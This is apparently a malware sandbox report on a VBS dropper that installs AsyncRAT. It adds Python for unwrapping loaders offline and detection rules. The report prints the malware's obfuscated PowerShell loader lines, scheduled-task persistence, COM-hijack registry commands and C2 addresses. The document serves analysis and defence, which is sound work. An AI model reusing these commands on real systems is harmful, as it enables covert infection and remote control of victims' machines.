Analysis Overview
SHA256
343445a6356dcfd38e165f2402b8150627a43aceba0c8de267ef44cc9a17d663
Threat Level: Known bad
The file CSSA876245.vbs was found to be: Known bad.
Malicious Activity Summary
AsyncRat
Async RAT payload
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Checks computer location settings
Obfuscated with Agile.Net obfuscator
Event Triggered Execution: Component Object Model Hijacking
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
Uses Task Scheduler COM API
Suspicious use of SetWindowsHookEx
Modifies registry key
Modifies registry class
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-09-17 07:13
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-09-17 07:13
Reported
2024-09-17 07:15
Platform
win7-20240903-en
Max time kernel
120s
Max time network
120s
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1628 wrote to memory of 2360 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1628 wrote to memory of 2360 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1628 wrote to memory of 2360 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2360 wrote to memory of 2712 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2360 wrote to memory of 2712 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2360 wrote to memory of 2712 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\CSSA876245.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $zcxuqriwmospjyfktlgb = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('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'));powershell $zcxuqriwmospjyfktlgb
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "IEx( NeW-obJeCT iO.COmpreSSioN.deflaTEsTReAm([io.MeMoRYstREaM][coNVeRT]::frombAse64sTriNG( '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' ), [IO.CoMpreSSioN.COMprEssionmODE]::DeCOMpREsS)|% {NeW-obJeCT sySTEm.IO.sTREaMreadER($_,[TEXT.ENCOdinG]::aSCiI)} |%{$_.ReaDTOEnD()} )"
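The two PowerShell command lines above are a two-layer loader: stage 1 base64-decodes an ASCII string and re-invokes powershell with it, and stage 2 base64-decodes again, inflates the bytes with a .NET DeflateStream and hands the text to IEX. Both layers can be unwrapped offline without executing anything. The Python below is an added example and is not part of the sandbox report or of the malware; because the base64 blobs have been removed from this page, it constructs its own sample with `build_sample` (the stage text mirrors the casing-mangled launcher from the report) and unwraps it with `recover_script`. All function names are the example's own.

```python
import base64
import re
import zlib

# Matches the argument of [Convert]::FromBase64String('...') regardless of the
# random casing the loader uses (frombAse64sTriNG, FromBase64String, ...).
_B64_ARG = re.compile(r"FromBase64String\(\s*'([A-Za-z0-9+/=]+)'\s*\)", re.IGNORECASE)


def decode_stage1(b64_text):
    """Reverse [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String(...))."""
    return base64.b64decode(b64_text).decode("ascii")


def inflate_stage2(b64_text):
    """Reverse New-Object IO.Compression.DeflateStream(..., Decompress) + StreamReader(ASCII).

    .NET DeflateStream writes raw DEFLATE with no zlib header, so zlib must be told
    to expect a raw stream: negative wbits. (A GZipStream loader would need wbits=31.)
    """
    raw = base64.b64decode(b64_text)
    return zlib.decompress(raw, wbits=-15).decode("ascii")


def extract_base64_arg(command_line):
    """Pull the base64 blob out of the first FromBase64String('...') call on a line."""
    m = _B64_ARG.search(command_line)
    if m is None:
        raise ValueError("no FromBase64String('...') argument found")
    return m.group(1)


def recover_script(stage1_command_line):
    """Walk both layers: stage-1 line -> launcher text -> inner base64 -> inflated script."""
    launcher = decode_stage1(extract_base64_arg(stage1_command_line))
    return inflate_stage2(extract_base64_arg(launcher))


def build_sample(final_script):
    """Constructed test input only: wrap a script exactly the way the two loader stages do."""
    comp = zlib.compressobj(level=9, wbits=-15)  # raw DEFLATE, like .NET DeflateStream
    deflated = comp.compress(final_script.encode("ascii")) + comp.flush()
    inner_b64 = base64.b64encode(deflated).decode("ascii")
    launcher = (
        "IEx( NeW-obJeCT iO.COmpreSSioN.deflaTEsTReAm([io.MeMoRYstREaM][coNVeRT]::"
        "frombAse64sTriNG( '" + inner_b64 + "' ), [IO.CoMpreSSioN.COMprEssionmODE]::DeCOMpREsS)"
        "|% {NeW-obJeCT sySTEm.IO.sTREaMreadER($_,[TEXT.ENCOdinG]::aSCiI)} |%{$_.ReaDTOEnD()} )"
    )
    outer_b64 = base64.b64encode(launcher.encode("ascii")).decode("ascii")
    return (
        '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
        "$v = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('"
        + outer_b64 + "'));powershell $v"
    )


# Constructed stand-in for the real payload, which is not on this page.
SAMPLE_SCRIPT = 'Write-Output "constructed sample, not the real payload"'

if __name__ == "__main__":
    print(recover_script(build_sample(SAMPLE_SCRIPT)))
```

Before reusing this on another sample, check the .NET type named in the launcher (DeflateStream vs GZipStream) and the encoding passed to the StreamReader (ASCII here; UTF-16 or UTF-8 variants exist), since both change the decode step.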
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www1.coulmandental.com | udp |
| US | 34.192.83.212:443 | www1.coulmandental.com | tcp |
| US | 34.192.83.212:443 | www1.coulmandental.com | tcp |
Files
memory/2360-4-0x000007FEF5B3E000-0x000007FEF5B3F000-memory.dmp
memory/2360-5-0x000000001B820000-0x000000001BB02000-memory.dmp
memory/2360-6-0x00000000004B0000-0x00000000004B8000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 5e7e0ac6cf0ae479e0d8bbd7f214b26c |
| SHA1 | b408c68964283271d298a846965ffd29e1b1bf44 |
| SHA256 | 87d2b73b5be9ccc9602c3e81370536e8718cd0d54d1439e24333fdc74c0208b5 |
| SHA512 | 1b5458285923e5456a6eb77c6cc4a396c515dfb5d7195231d62fea64c3e410cb33ce28d77a5d84edd02be5de41360af6b83635afb8ca44150fffec8849738ff0 |
memory/2360-12-0x000007FEF5880000-0x000007FEF621D000-memory.dmp
memory/2360-13-0x000007FEF5B3E000-0x000007FEF5B3F000-memory.dmp
memory/2360-14-0x000007FEF5880000-0x000007FEF621D000-memory.dmp
memory/2360-15-0x000007FEF5880000-0x000007FEF621D000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-09-17 07:13
Reported
2024-09-17 07:15
Platform
win10v2004-20240802-en
Max time kernel
121s
Max time network
149s
Signatures
AsyncRat
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Event Triggered Execution: Component Object Model Hijacking
Obfuscated with Agile.Net obfuscator
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\ | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\RedroCrypt.dll" | C:\Windows\system32\reg.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\CSSA876245.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $zcxuqriwmospjyfktlgb = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('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'));powershell $zcxuqriwmospjyfktlgb
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "IEx( NeW-obJeCT iO.COmpreSSioN.deflaTEsTReAm([io.MeMoRYstREaM][coNVeRT]::frombAse64sTriNG( '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' ), [IO.CoMpreSSioN.COMprEssionmODE]::DeCOMpREsS)|% {NeW-obJeCT sySTEm.IO.sTREaMreadER($_,[TEXT.ENCOdinG]::aSCiI)} |%{$_.ReaDTOEnD()} )"
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /sc minute /mo 2 /tn "Cloud OneDrive" /tr C:\ProgramData\Cloud\cloud.vbs
C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\ProgramData\Cloud\cloud.vbs"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\ProgramData\Cloud\cloud.bat
C:\Windows\system32\reg.exe
REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f
C:\Windows\system32\reg.exe
REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\RedroCrypt.dll /f
C:\Windows\system32\cmd.exe
cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1"
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe
"C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\RegSvcs.exe"
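The process list above is the whole persistence and execution chain from this run: schtasks registers a task that runs C:\ProgramData\Cloud\cloud.vbs every two minutes, cloud.bat uses reg.exe to register a user-hive COM server (HKCU\Software\Classes\CLSID\{...}\InProcServer32 = C:\RedroCrypt.dll), cloud.ps1 is run with the window hidden and execution policy bypassed, and RegSvcs.exe is started with no assembly argument. The report does not show which process ends up hosting the AsyncRAT payload (the WriteProcessMemory table for this run is empty), so a no-argument RegSvcs.exe launch is flagged on the general basis that it is a common hollowing host, not because the page proves injection into it. The Python below is an added example of process-creation rules for that chain and is not from the report; its sample events are the page's own command lines (base64 blob elided) plus one constructed benign control, and parent images are assumed where the report does not show them. Rule and function names are the example's own.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    image: str          # full path of the created process
    parent_image: str   # full path of its parent (assumed where the report omits it)
    command_line: str


# schtasks /create ... /tr <script under a user-writable directory>
_SCHTASKS_SCRIPT = re.compile(
    r'/create\b.*?/tr\s+"?\S*\\(ProgramData|AppData|Temp)\\\S*?\.(vbs|vbe|js|jse|wsf|bat|cmd|ps1)\b',
    re.IGNORECASE)
# reg add of a CLSID InProcServer32 key in the user hive (user-hive COM server registration)
_COM_INPROC = re.compile(
    r'\badd\s+"?(HKCU|HKEY_CURRENT_USER)\\Software\\Classes\\CLSID\\\{[0-9a-f-]{36}\}\\InProcServer32\b',
    re.IGNORECASE)
# powershell switches that hide the window or bypass profile/policy/interaction
_PS_FLAGS = [re.compile(p, re.IGNORECASE) for p in (
    r"-nop(rofile)?\b", r"-w(indowstyle)?\s+hidden\b",
    r"-e(p|x|xec|xecutionpolicy)\s+bypass\b", r"-noni(nteractive)?\b", r"-e(nc|ncodedcommand)\b")]
# in-memory decode / decompress / eval primitives on the command line itself
_PS_STAGE = re.compile(r"FromBase64String|DeflateStream|GZipStream|\bIEX\b|Invoke-Expression",
                       re.IGNORECASE)


def _args_after_image(command_line):
    """Strip the (possibly quoted) image path from a command line and return the rest."""
    cl = command_line.strip()
    if cl.startswith('"'):
        end = cl.find('"', 1)
        return cl[end + 1:].strip() if end != -1 else ""
    parts = cl.split(None, 1)
    return parts[1].strip() if len(parts) > 1 else ""


def evaluate(ev):
    """Return the list of rule names an event triggers (empty list means no hit)."""
    image = ev.image.lower()
    parent = ev.parent_image.lower()
    cl = ev.command_line
    hits = []
    if image.endswith("schtasks.exe") and _SCHTASKS_SCRIPT.search(cl):
        hits.append("T1053.005 scheduled task runs a script from a user-writable directory")
    if image.endswith("reg.exe") and _COM_INPROC.search(cl):
        hits.append("T1546.015 user-hive CLSID InProcServer32 registration (COM hijack)")
    if image.endswith("powershell.exe"):
        n = sum(1 for p in _PS_FLAGS if p.search(cl))
        if n >= 2:
            hits.append(f"T1059.001 powershell with {n} evasion switches")
        if _PS_STAGE.search(cl):
            hits.append("T1059.001/T1027 in-memory decode or decompress stage on the command line")
        if parent.endswith("wscript.exe"):
            hits.append("T1059.005 script host spawned powershell")
    if image.endswith(("regsvcs.exe", "regasm.exe")) and _args_after_image(cl) == "":
        hits.append("T1055 .NET utility started without an assembly argument (hollowing host)")
    return hits


def scan(events):
    """Flatten rule hits over a list of events as (image basename, rule) pairs."""
    return [(ev.image.rsplit("\\", 1)[-1], rule) for ev in events for rule in evaluate(ev)]


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Sample events taken from the report's behavioral2 process list; the last one is a
# constructed benign control (a vendor updater task) that should produce no hit.
SAMPLE_EVENTS = [
    ProcEvent(PS, r"C:\Windows\System32\WScript.exe",
              r'"' + PS + r"""" $zcxuqriwmospjyfktlgb = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('<blob removed from report>'));powershell $zcxuqriwmospjyfktlgb"""),
    ProcEvent(r"C:\Windows\system32\schtasks.exe", PS,
              r'"C:\Windows\system32\schtasks.exe" /create /sc minute /mo 2 /tn "Cloud OneDrive" /tr C:\ProgramData\Cloud\cloud.vbs'),
    ProcEvent(r"C:\Windows\system32\reg.exe", r"C:\Windows\System32\cmd.exe",
              r"REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f"),
    ProcEvent(r"C:\Windows\system32\reg.exe", r"C:\Windows\System32\cmd.exe",
              r"REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\RedroCrypt.dll /f"),
    ProcEvent(PS, r"C:\Windows\system32\cmd.exe",
              r'Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1"'),
    ProcEvent(r"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe", PS,
              r'"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe"'),
    ProcEvent(r"C:\Windows\system32\schtasks.exe", r"C:\Windows\System32\msiexec.exe",
              r'schtasks /create /sc daily /tn "Vendor Update" /tr "C:\Program Files\Vendor\update.exe"'),
]

if __name__ == "__main__":
    for name, rule in scan(SAMPLE_EVENTS):
        print(f"{name:14} {rule}")
```

The first REG ADD (creating the bare CLSID key) deliberately does not fire: the InProcServer32 value is what makes the registration exploitable, and alerting on it alone keeps the rule quiet on ordinary per-user COM registration. On a live host the same InProcServer32 check can be run against the hive directly rather than against process events.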
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www1.coulmandental.com | udp |
| US | 34.192.83.212:443 | www1.coulmandental.com | tcp |
| US | 8.8.8.8:53 | 212.83.192.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 88.119.175.153:6606 | | tcp |
| US | 8.8.8.8:53 | 153.175.119.88.in-addr.arpa | udp |
| US | 88.119.175.153:6606 | | tcp |
Files
memory/3956-0-0x00007FFAED523000-0x00007FFAED525000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_l1ohuera.zjr.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3956-6-0x0000021842910000-0x0000021842932000-memory.dmp
memory/3956-11-0x00007FFAED520000-0x00007FFAEDFE1000-memory.dmp
memory/3956-12-0x00007FFAED520000-0x00007FFAEDFE1000-memory.dmp
memory/3956-22-0x00007FFAED523000-0x00007FFAED525000-memory.dmp
memory/3956-23-0x00007FFAED520000-0x00007FFAEDFE1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1a11402783a8686e08f8fa987dd07bca |
| SHA1 | 580df3865059f4e2d8be10644590317336d146ce |
| SHA256 | 9b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0 |
| SHA512 | 5f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 8d089c855358969266a3275f0ec4f955 |
| SHA1 | 5ce30b598cfa0c2008541b1b549673401971dc3d |
| SHA256 | e198883dc78657f44bae11e2de5f56bc0f41eb6440f73cd3d65c30878b858734 |
| SHA512 | f240dcfc7adcca3140cdc2f8f387ac2053a7fd6e5e474a4008cf38d03506f99e361a5d6e970480ab1155ad00531b9d9095ed2a502ad09e7e442cdf7bcf932320 |
memory/3956-32-0x00007FFAED520000-0x00007FFAEDFE1000-memory.dmp
C:\ProgramData\Cloud\cloud.vbs
| MD5 | 7079642a22a106d0ed6f227cc70899ae |
| SHA1 | 60dd57af3518c0ea4104379ad233b5982b231283 |
| SHA256 | b098e1055dc3dd3156236ee515e5dfbefd746d84578197f2309968625b831724 |
| SHA512 | ca1e9e201785fa611520ee2585208fb0684fd338ff1ab1d515523e03677ac4ac1ca5353fdc17bcba4c6c39aa37f9be182c5f7187b8dd9520c8604a001bd69f80 |
C:\ProgramData\Cloud\cloud.bat
| MD5 | b8bdfc7895feaaacba3711d17be6778a |
| SHA1 | fa0bc12827b348fe540a13683897deb207650df7 |
| SHA256 | e209153dda335fec8fa021f1022c4f9fe041cb527c2b9068eb9ec911429f20a3 |
| SHA512 | ea91a8262eacba0bcd6f692b5141124d7fedc98507ad6ab71ade565b347fe328780221f6972cc5c98a9471662474bf8c93e1219d241ff5f90579f7f8e8dd5156 |
C:\ProgramData\Cloud\cloud.ps1
| MD5 | 81fe8fe5684ecf16d936250bb94c852a |
| SHA1 | a0a18d8d75e12546baa0b7dfd0dfb02dbefbac40 |
| SHA256 | ca0713d77d71359ff692385a2bb92e0b22fe7f0db9a356fd4ffbbfeb34911584 |
| SHA512 | d0a35efecc947e2e5d99d3f58a494693d5ebd48635f749f87f341e0a1ce965b7a413754a0316c973eebac4c8e8a12315a916adbc4350a0819132debde1ea7013 |
memory/1712-46-0x0000022CEA330000-0x0000022CEA33E000-memory.dmp
memory/3836-47-0x00000000009C0000-0x00000000009D8000-memory.dmp
memory/3836-49-0x0000000005100000-0x0000000005116000-memory.dmp
memory/3836-50-0x00000000059D0000-0x0000000005F74000-memory.dmp
memory/3836-51-0x0000000005610000-0x00000000056A2000-memory.dmp
memory/3836-52-0x0000000005600000-0x000000000560A000-memory.dmp
memory/3836-53-0x0000000006080000-0x000000000611C000-memory.dmp
memory/3836-54-0x00000000062C0000-0x0000000006326000-memory.dmp